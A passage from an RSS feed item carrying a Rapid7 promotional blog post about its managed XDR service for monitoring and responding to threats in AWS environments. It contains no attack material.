response.</p><h2>Augmenting Your Security Team with a Fleet of CDR Experts</h2><p>Protecting your AWS environment doesn’t need to be a solo effort. With Rapid7 MXDR, you gain access to our extensive team of seasoned MDR analysts who diligently monitor, triage, and respond to incidents in real time, reducing operational burden. With an expert <a href="/fundamentals/what-is-managed-detection-and-response-mdr/">MDR</a> team on call, teams are ready to contain incidents and limit blast radius. Customized mitigation and response strategies for AWS workloads, aligned with your unique environment and risk tolerance enables our team to provide clear insights, remediation guidance and future mitigation recommendations to improve security and drive executive buy-in for security investments.</p><p>By deeply integrating cloud risk context from our industry-leading <a href="/fundamentals/what-is-cloud-native-application-protection-platform-cnapp/">CNAPP</a> capabilities into the incident response workflow, our MDR analysts are equipped with environmental awareness needed to act more quickly on your behalf to stop attackers in their tracks.</p><p>Rapid7 MXDR eliminates the need for piecemeal tools and processes by delivering end-to-end security services that combine AWS-native telemetry with cross-platform intelligence. The result is comprehensive threat detection and mitigation across your AWS environments without the complexity of managing multiple tools, providing:</p><ul><li><strong>Cloud Attack Surface Visibility and Advanced Threat Detection: </strong>Correlating AWS telemetry with global threat intelligence to build a dynamic map of your environment, uncover sophisticated attacks and spot avenues for lateral movement.</li><li><strong>Continuous Coverage and Proactive Threat Hunting:</strong> Lean on our team of seasoned SOC experts who monitor, triage, and respond to incidents in real time, reducing operational burden.</li><li><strong>Visibility into Cloud Identities, Their Permissions and Privileges:</strong> Monitor all cloud accounts and identities and proactively spot anomalous and potentially malicious user behavior, privilege escalations, or unusual API calls.</li><li><strong>AI-Assisted Triage with Risk-Aware Context:</strong> Automatic context enrichment for cloud alerts with the relevant information SOC analysts need to understand the posture of a compromised account or resource and prioritize response.</li></ul><h2>Take Command of Your AWS Security Today</h2><p>Whether you’re protecting critical workloads or responding to active threats, Rapid7 <a href="/fundamentals/what-is-managed-xdr-mxdr/">managed XDR</a> enables organizations to secure their AWS environments with confidence. From continuous monitoring to expert response, Rapid7 ensures your AWS assets remain protected while allowing your team to focus on driving business innovation.</p><p><a href="/contact/">Contact Rapid7 today</a> to see how MXDR can elevate your AWS security posture.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2024/12/03/expanded-soc-coverage-into-aws-environments-with-rapid7-mxdr</link>
      <guid isPermaLink="false">bltc96e1cc527c78b40</guid>
      <category><![CDATA[Managed XDR]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Tue, 03 Dec 2024 14:01:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1e9fd158cbe4bc45/683de2a15619a1011bc6eb21/GettyImages-2166707299.jpg" medium="image" />
    </item>
  </channel>
</rss>